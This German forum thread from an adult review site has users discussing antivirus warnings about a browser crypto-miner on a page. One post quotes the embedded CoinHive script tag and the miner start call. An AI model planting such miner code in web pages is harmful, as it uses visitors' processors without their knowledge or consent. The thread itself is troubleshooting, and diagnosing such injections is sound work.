Moin,

ich hatte grade hier im Forum auf "Hurren-Bewertung" geklickt.
Da hat mein Antivirus gleich in Trojaner (js/Miner.af) gemeldet.

Was dazu bekannt?

Kann ich bestätigen. Mein Mining-Blocker hat "angeschlagen"!!

js-Miner klingt nach Javascript und nach Kryptowährungsschürfern.

Das sind Programme, die im Browser komplexe Rechenoperationen durchführen, um Coins für den Seitenbetreiber zu erzeugen. Normalerweise hinterlassen die keine Spuren, wenn man den Browser schliesst.

Ich vermute mal, da will sich ein Servertechniker was dazuverdienen.

Soeit ich sehe kann ist das Problem behoben. Mehr weiß ich aber im Moment auch nicht.

Das Problem besteht immer noch bzw. wieder, siehe Warnung von Norton gerade eben:

56224

Bei mir zeigt weder ublock noch bluhell etwas an.

Nutze auch Norton und mir wird nichts angezeigt.

Norton schlägt bei mir immer noch an, genau so wie im Bild oben... komisch!

Welche Version nutzt Du? Ich hab' die Versionsnr. 22.14.2.13 (Hilfe->Info)

Bei mir kommt auch nichts, also weder eine Meldung (Kaspersky), noch ist eine Auswirkung da. Getestet habe ich gerade mit Firefox, Chrome, Edge und über Virustotal.

Malwares.com findet ein Hash-Fragment, welches aber nicht aktiv ist und auch keinem Schädlicg, oder Programm zugeordnet ist, ausserdem ist der Fund vom 12.06.

auf der Seite ...
<script src="https://coinhive.com/lib/coinhive.min.js"></script>


<script>
var miner = new CoinHive.Anonymous('EJYAju9mV24QhGXkGMkiyCDDr8q8gE tL');
miner.start();
</script>

_coinhive.com_lib_coinhive.min.js mal googeln....
Einen Virus kann man das nicht nennen, es ist ein Miner, der (hier) ungefragt CPU nutzt ( in der Theorie ).
Es sieht nicht so aus, als ob er tatsächlich ( unter W10 .B. ) seine Dienste tut.
Beim Kunden "Anonymous" kann nur spekuliert werden. Klarheit kann hier nur der Admin schaffen ( Injection oder Absicht des Seitenbetreibers ).

Ja, das wir ein Problem mit dem Ding hatten ist ja bekannt:

https://www.tabulose-huren.com/showthread.php/43279-Coinhive-Crypto-Miner

Und ja, das script steht theoretisch noch drin und deshalb springen manche scanner auch an, aber der miner ist nicht mehr aktiv. Zumindest kann ich keinerlei Aktivitäten entdecken.

Also das Abschiedsgeschenk des Technikers..... https://tabulose-huren.com/images/smilies/rolleyes.png
Das Teil ist eingebettet und aktiv (miner.start();).

Da nicht auf allen Seiten eingebettet .... ist das Framework der Seite (sofern es eines gibt) eher nicht betroffen.
Lange Rede, kurzer Sinn. Nahezu jeder AdBlocker filtert das raus .... nur wenige AV's springen drauf an. Avast und Norton gehören dazu.

Deshalb ... Admin, nicht MOD. Sorry Heineken, nix persönliches.
Schlamprei oder Absicht an der Basis ... ;)

...
Das Teil ist eingebettet und aktiv (miner.start();).
...
Ja, aber es führt zu einer nicht aktiven Seite. Und ja, der Aufruf ist nicht auskommentiert.


Schlamperei oder Absicht an der Basis ... ;)

Das die Huren-Bewertung auch betroffen ist wurde offensichtlich übersehen. Was aber sicher auch daran liegt, das das Ding nicht mehr aktiv ist. Nun hängt da eben noch diese Datenleiche rum. :rolleyes:

Nu wollen wir aber nicht zanken ... das Script liegt wo es liegt (nicht im Einflussbereich des Admins) und kann gestartet werden.
Das würde ich aktiv nennen ...
Das es in der Praxis keine größere Bedrohung darstellt, bedeutet nicht, das es nicht aktiv ist.
Weil es diverse Programme abwürgen, heißt das nicht, das es "inaktiv" ist.

PS: die Foren-Uhr geht 2 Stunden nach .... :D Das stärkt die Theorie der "Schlampigkeit" ...

Ist die falsche Wortwahl, da hast du Recht. Ich wollte damit sagen, das das Ding im Moment nicht "aktiv" :) ist. Die Seite ist tot, nicht nur die Seite wo das Ding selbst liegt, sondern die gesamte.

Kann man den Code nicht einfach entfernen und gut ist's?